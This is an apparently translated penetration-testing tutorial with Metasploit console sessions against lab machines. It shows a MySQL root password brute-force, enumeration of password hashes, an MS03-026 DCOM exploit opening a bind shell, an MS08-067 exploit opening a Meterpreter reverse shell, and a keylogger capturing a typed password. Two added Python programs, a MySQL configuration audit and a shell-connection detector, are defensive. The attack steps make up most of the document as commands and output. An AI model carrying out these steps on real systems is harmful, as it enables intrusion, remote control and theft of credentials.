After reconnaissance and scanning, and with the necessary information in hand,
we move on to gaining access to the system.
Exploiting a weak MySQL server password through the brute-force technique.
root@bt:/# msfconsole
=[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
=[ svn r15549 updated 169 days ago (2012.02.23)
Warning: This copy of the Metasploit Framework was last updated 169 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://community.rapid7.com/docs/DOC-1306
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set BRUTEFORCE_SPEED 5
BRUTEFORCE_SPEED => 5
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.108
RHOSTS => 192.168.1.108
msf auxiliary(mysql_login) > set THREADS 30
THREADS => 30
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > run
[*] 192.168.1.108:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 192.168.1.108:3306 MYSQL - [1/2] - Trying username:'root' with password:''
[*] 192.168.1.108:3306 MYSQL - [1/2] - failed to login as 'root' with password ''
[*] 192.168.1.108:3306 MYSQL - [2/2] - Trying username:'root' with password:'root'
[+] 192.168.1.108:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
In the example above we used the auxiliary module
auxiliary/scanner/mysql/mysql_login, set the brute-force option (BRUTEFORCE_SPEED), the target host
192.168.1.108, 30 concurrent threads and, finally, "guessed" a default password
commonly used for the MySQL user, in this case root; we then executed the module with
the run command. The RESULT: SUCCESSFUL LOGIN 'root' : 'root'
After this successful attempt, we can advance further:
msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf auxiliary(mysql_enum) > set PASSWORD root
PASSWORD => root
msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_enum) > run
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*] MySQL Version: 5.0.51a-3ubuntu5
[*] Compiled for the following OS: debian-linux-gnu
[*] Architecture: i486
[*] Server Hostname: metasploitable
[*] Data Directory: /var/lib/mysql/
[*] Logging of queries and logins: OFF
[*] Old Password Hashing Algorithm OFF
[*] Loading of local files: ON
[*] Logins with old Pre-4.1 Passwords: OFF
[*] Allow Use of symlinks for Database Files: YES
[*] Allow Table Merge: YES
[*] SSL Connections: Enabled
[*] SSL CA Certificate: /etc/mysql/cacert.pem
[*] SSL Key: /etc/mysql/server-key.pem
[*] SSL Certificate: /etc/mysql/server-cert.pem
[*] Enumerating Accounts:
[*] List of Accounts with Password Hashes:
[*] User: root Host: localhost Password Hash:
*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] User: root Host: ubuntu804-base Password Hash:
*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] User: root Host: 127.0.0.1 Password Hash:
*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] User: Host: localhost Password Hash:
[*] User: Host: ubuntu804-base Password Hash:
[*] User: debian-sys-maint Host: localhost Password Hash:
*E07F0A7CCC0044345116513C989F45663C1F8347
[*] User: root Host: % Password Hash:
*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] The following users have GRANT Privilege:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: debian-sys-maint Host: localhost
[*] User: root Host: %
[*] The following users have CREATE USER Privilege:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following users have RELOAD Privilege:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: debian-sys-maint Host: localhost
[*] User: root Host: %
[*] The following users have SHUTDOWN Privilege:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: debian-sys-maint Host: localhost
[*] User: root Host: %
[*] The following users have SUPER Privilege:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: debian-sys-maint Host: localhost
[*] User: root Host: %
[*] The following users have FILE Privilege:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: debian-sys-maint Host: localhost
[*] User: root Host: %
[*] The following users have PROCESS Privilege:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: debian-sys-maint Host: localhost
[*] User: root Host: %
[*] The following accounts have privileges to the mysql database:
[*] User: root Host: localhost
[*] User: root Host: ubuntu804-base
[*] User: root Host: 127.0.0.1
[*] User: debian-sys-maint Host: localhost
[*] User: root Host: %
[*] Anonymous Accounts are Present:
[*] User: Host: localhost
[*] User: Host: ubuntu804-base
[*] The following accounts have empty passwords:
[*] User: Host: localhost
[*] User: Host: ubuntu804-base
[*] The following accounts are not restricted by source:
[*] User: root Host: %
[*] Auxiliary module execution completed
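From the defender's side, the enumerator output above is essentially a free configuration audit: it shows login/query logging switched off (which is why the brute-force run in the first section leaves no server-side trace), local file loading on, an anonymous account, a root account reachable from any host, and FILE privilege on that remote account. The following Python program is an added example, not code from the original tutorial or from Metasploit: it parses mysql_enum-style text, checks each account's hash against the MySQL 4.1+ `mysql_native_password` scheme (`*` + SHA1(SHA1(password)) in upper-case hex) to catch passwords equal to the account name, and emits the SQL a DBA would run to fix each finding. The sample input is a constructed excerpt modelled on the page's output (the hash values are the ones printed above); the allow-list of privileges considered dangerous on remotely usable accounts and the 5.0-era `SET PASSWORD ... = PASSWORD()` syntax are assumptions.

```python
"""
Audit the findings printed by Metasploit's mysql_enum module from a defender's
side: parse the text, flag weak accounts and risky server settings, and emit
the SQL a DBA would run to fix them.  Added example, not code from the original
tutorial; the sample below is a constructed excerpt modelled on the page's output.
"""
import hashlib
import re

# Constructed excerpt (hash values and account list taken from the page's run).
SAMPLE_ENUM_OUTPUT = """\
[*] Logging of queries and logins: OFF
[*] Loading of local files: ON
[*] List of Accounts with Password Hashes:
[*] User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] User: root Host: % Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] User: Host: localhost Password Hash:
[*] User: debian-sys-maint Host: localhost Password Hash: *E07F0A7CCC0044345116513C989F45663C1F8347
[*] The following users have FILE Privilege:
[*] User: root Host: localhost
[*] User: root Host: %
[*] User: debian-sys-maint Host: localhost
[*] The following users have PROCESS Privilege:
[*] User: root Host: localhost
[*] Auxiliary module execution completed
"""

ACCOUNT_RE = re.compile(r"^\[\*\] User:(.*?) Host: (\S+)(?: Password Hash:(.*))?$")
PRIV_HEADER_RE = re.compile(r"^\[\*\] The following users have (.+) Privilege:$")
SETTING_RE = re.compile(r"^\[\*\] ([^:]+): (ON|OFF|YES|NO|Enabled|Disabled)$")
REMOTE_DANGEROUS_PRIVS = {"FILE", "SUPER", "PROCESS"}   # assumed: risky on non-localhost accounts


def mysql_native_hash(password):
    """MySQL 4.1+ password hash: '*' + SHA1(SHA1(password)) as upper-case hex."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_enum_output(text):
    """Split mysql_enum output into server settings, accounts and privilege holders."""
    settings, accounts, privileges = {}, [], {}
    current_priv = None
    for line in text.splitlines():
        m = PRIV_HEADER_RE.match(line)
        if m:
            current_priv = m.group(1)
            privileges[current_priv] = []
            continue
        m = ACCOUNT_RE.match(line)
        if m:
            user, host, pw_hash = m.group(1).strip(), m.group(2), m.group(3)
            if pw_hash is not None:            # line from the account/hash listing
                accounts.append({"user": user, "host": host, "hash": pw_hash.strip()})
            elif current_priv is not None:     # line under a "... Privilege:" header
                privileges[current_priv].append((user, host))
            continue
        if line.endswith(":"):                 # any other section header closes the privilege list
            current_priv = None
            continue
        m = SETTING_RE.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings, accounts, privileges


def audit(settings, accounts, privileges):
    """Return findings as dicts with severity, subject, issue and a fix (SQL or a note)."""
    findings = []

    def add(severity, subject, issue, fix):
        findings.append({"severity": severity, "subject": subject, "issue": issue, "fix": fix})

    if settings.get("Logging of queries and logins") == "OFF":
        add("medium", "server", "logins and queries are not logged, so brute-force attempts leave no trace",
            "enable the general/error log in my.cnf and ship it to central logging")
    if settings.get("Loading of local files") == "ON":
        add("medium", "server", "local_infile is ON; with FILE privilege this reads server-side files",
            "SET GLOBAL local_infile = 0;")
    for a in accounts:
        acct = f"'{a['user']}'@'{a['host']}'"
        if a["user"] == "":
            add("high", acct, "anonymous account", f"DROP USER {acct};")
            continue
        if a["hash"] == "":
            add("high", acct, "empty password", f"SET PASSWORD FOR {acct} = PASSWORD('<new-strong-password>');")
        elif a["hash"] == mysql_native_hash(a["user"]):
            add("high", acct, "password equals the account name",
                f"SET PASSWORD FOR {acct} = PASSWORD('<new-strong-password>');")
        if a["host"] == "%":
            add("high", acct, "account accepts logins from any source host", f"DROP USER {acct};")
    for priv, holders in privileges.items():
        for user, host in holders:
            if priv in REMOTE_DANGEROUS_PRIVS and host != "localhost":
                add("medium", f"'{user}'@'{host}'", f"{priv} privilege held by a remotely usable account",
                    f"REVOKE {priv} ON *.* FROM '{user}'@'{host}';")
    return findings


def run_audit(text=SAMPLE_ENUM_OUTPUT):
    """Parse and audit in one step; returns the list of findings."""
    return audit(*parse_enum_output(text))


if __name__ == "__main__":
    for f in run_audit():
        print(f"[{f['severity']}] {f['subject']}: {f['issue']}\n    fix: {f['fix']}")
```

Run against the real module output, paste the text (with wrapped hash lines re-joined) into `run_audit()`; the "password equals the account name" check fires for every root entry above because all of them carry the same hash that the successful `root:root` login already proved is the hash of `root`.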
Now, with the mysql_sql module, we can inspect the database schemas:
msf > use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > set USER root
USER => root
msf auxiliary(mysql_sql) > set PASSWORD root
PASSWORD => root
msf auxiliary(mysql_sql) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf auxiliary(mysql_sql) > set SQL show databases
SQL => show databases
msf auxiliary(mysql_sql) > set PORT 3306
PORT => 3306
msf auxiliary(mysql_sql) > run
[*] Sending statement: 'show databases'...
[*] | information_schema |
[*] | mysql |
[*] | tikiwiki |
[*] | tikiwiki195 |
[*] Auxiliary module execution completed
Our next step is to attack systems vulnerable through RPC.
msf > nmap -sS 192.168.1.101
[*] exec: nmap -sS 192.168.1.101
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-08-10 12:39 BRT
Nmap scan report for 192.168.1.101
Host is up (0.00039s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
MAC Address: 00:0C:29:7D:B7:84 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
Note above that our target has port 135 listening; let's search for exploits
to carry out the RPC DCOM vulnerability attack.
msf > search dcom
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC DCOM Interface Overflow
exploit/windows/driver/broadcom_wifi_ssid 2006-11-11 low Broadcom Wireless Driver Probe Response SSID Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 good Microsoft NetDDE Service Overflow
We will use exploit/windows/dcerpc/ms03_026_dcom:
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf exploit(ms03_026_dcom) > set RPORT 135
RPORT => 135
msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.101[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.101[135] ...
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.1.109:38144 -> 192.168.1.101:4444) at 2012-08-10 12:46:18 -0300
Microsoft Windows [versÆo 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
As we can see above, our attempt succeeded once more. Next we will use
Meterpreter to compromise the target and capture keystrokes.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.107
RHOST => 192.168.1.107
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.109:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.107
[*] Meterpreter session 2 opened (192.168.1.109:4444 -> 192.168.1.107:1047) at 2012-08-10 12:57:24 -0300
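Both sessions above leave a characteristic pair of connections in firewall or flow logs: in the ms03_026_dcom case the attacker first touches 135/tcp and six seconds later connects to the victim on a brand-new port (the bind shell on 4444); in the ms08_067_netapi case the attacker touches 445/tcp and five seconds later the victim itself opens an outbound connection to the attacker on 4444 (the reverse shell). The following Python program is an added example, not code from the original tutorial or from Metasploit: it correlates any contact with an RPC/SMB port with a new connection between the same two hosts shortly afterwards and labels it as a bind or reverse shell according to direction. The flow records are constructed and modelled on the endpoints Metasploit printed above; the 60-second window and the allow-list of expected follow-up ports are assumptions to tune for a real network.

```python
"""
Detect the post-exploitation shell connections that an RPC/SMB exploit leaves in
connection logs: a bind shell (attacker connects *to* the victim on a new port
right after hitting 135/tcp) and a reverse shell (victim connects *out to* the
attacker right after being hit on 445/tcp).  Added example, not code from the
original tutorial; the flow records and the 60-second window are assumptions.
"""
import re
from datetime import datetime, timedelta

# Constructed flow records modelled on the page's two sessions; the 4444 connections
# mirror the endpoints Metasploit printed, the others are filler traffic.
SAMPLE_FLOWS = """\
2012-08-10 12:30:02 192.168.1.50:50210 -> 192.168.1.101:445
2012-08-10 12:40:11 192.168.1.101:1200 -> 192.168.1.10:53
2012-08-10 12:46:12 192.168.1.109:38101 -> 192.168.1.101:135
2012-08-10 12:46:18 192.168.1.109:38144 -> 192.168.1.101:4444
2012-08-10 12:57:19 192.168.1.109:35022 -> 192.168.1.107:445
2012-08-10 12:57:24 192.168.1.107:1047 -> 192.168.1.109:4444
2012-08-10 13:05:00 192.168.1.50:50311 -> 192.168.1.101:445
"""

FLOW_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+):(\d+) -> (\S+):(\d+)$")
EXPLOIT_SURFACE_PORTS = {135, 139, 445}                  # MSRPC / NetBIOS / SMB, as in the nmap output
EXPECTED_FOLLOWUP_PORTS = {53, 80, 88, 389, 443} | EXPLOIT_SURFACE_PORTS   # assumed allow-list
WINDOW = timedelta(seconds=60)                           # assumed correlation window


def parse_flows(text):
    """Parse 'timestamp src:port -> dst:port' lines into dicts sorted by time."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line)
        if not m:
            continue
        flows.append({
            "ts": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
            "src": m.group(2), "sport": int(m.group(3)),
            "dst": m.group(4), "dport": int(m.group(5)),
        })
    flows.sort(key=lambda f: f["ts"])
    return flows


def detect_post_exploit_shells(flows, window=WINDOW):
    """Correlate each contact with an exploit-surface port with a new connection
    between the same two hosts on an unexpected port inside the window."""
    alerts = []
    for i, trigger in enumerate(flows):
        if trigger["dport"] not in EXPLOIT_SURFACE_PORTS:
            continue
        attacker, victim = trigger["src"], trigger["dst"]
        for follow in flows[i + 1:]:
            if follow["ts"] - trigger["ts"] > window:
                break                                    # flows are sorted, nothing later qualifies
            if follow["dport"] in EXPECTED_FOLLOWUP_PORTS:
                continue
            if (follow["src"], follow["dst"]) == (attacker, victim):
                kind = "bind_shell"        # attacker -> victim on a new port (shell_bind_tcp)
            elif (follow["src"], follow["dst"]) == (victim, attacker):
                kind = "reverse_shell"     # victim -> attacker on a new port (reverse_tcp)
            else:
                continue
            alerts.append({
                "kind": kind, "attacker": attacker, "victim": victim,
                "trigger_port": trigger["dport"], "shell_port": follow["dport"],
                "delay_s": int((follow["ts"] - trigger["ts"]).total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_post_exploit_shells(parse_flows(SAMPLE_FLOWS)):
        print(f"{a['kind']}: {a['attacker']} hit {a['victim']}:{a['trigger_port']}, "
              f"shell on port {a['shell_port']} after {a['delay_s']}s")
```

The direction test is what distinguishes the two payload types: a bind shell shows up as the attacker initiating a second connection, a reverse shell as the victim initiating one, and in both cases a workstation that normally only talks to file shares and DNS suddenly has a high-port session with the host that just touched its RPC or SMB service.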
Our target has been compromised, so we can now run the commands for keystroke capture (keylogging). The first step is to review the processes, then migrate into the
chosen process, and finally capture the data:
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
416 wscntfy.exe x86 0 WHITEHAT-E8A438\cobaia C:\WINDOWS\system32\wscntfy.exe
496 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
528 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
568 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
604 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
628 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
684 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
840 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
856 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
936 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1092 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1148 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1256 logon.scr x86 0 WHITEHAT-E8A438\cobaia C:\WINDOWS\System32\logon.scr
1356 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1524 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1544 explorer.exe x86 0 WHITEHAT-E8A438\cobaia C:\WINDOWS\Explorer.EXE
1640 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
1676 VMwareTray.exe x86 0 WHITEHAT-E8A438\cobaia C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1684 vmtoolsd.exe x86 0 WHITEHAT-E8A438\cobaia C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1760 ctfmon.exe x86 0 WHITEHAT-E8A438\cobaia C:\WINDOWS\system32\ctfmon.exe
1840 cmd.exe x86 0 WHITEHAT-E8A438\cobaia C:\WINDOWS\system32\cmd.exe
1892 TPAutoConnect.exe x86 0 WHITEHAT-E8A438\cobaia C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2008 wuauclt.exe x86 0 WHITEHAT-E8A438\cobaia C:\WINDOWS\system32\wuauclt.exe
meterpreter > migrate 1544
[*] Migrating to 1544...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
www.backtrack.com [email protected] senha123
That's it! Now it's up to the pentester to use some creativity.